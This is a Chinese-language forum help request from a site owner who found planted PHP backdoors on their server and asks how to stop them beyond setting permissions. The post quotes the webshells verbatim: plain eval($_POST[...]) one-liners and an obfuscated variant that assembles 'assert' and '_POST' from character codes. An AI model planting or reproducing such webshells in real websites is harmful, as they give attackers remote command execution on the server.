网站多了几个PHP文件,eval($_POST['1']);

网站多了几个PHP,内容如下:eval($_POST['1']);

有的是其他内容, 我百度了一下发现时执行某些命令的,我测试了一下 如果权限没限制好的话 确实可以执行一些命令。 请问 除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?

还有个PHP文件内容如下:

<?php
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
?>

还有文件,名字是:13686921256303.virus_killed
内容是:

<?php eval($_POST[hardqmu7]);?>

请各位出出注意,谢谢了。

查看回复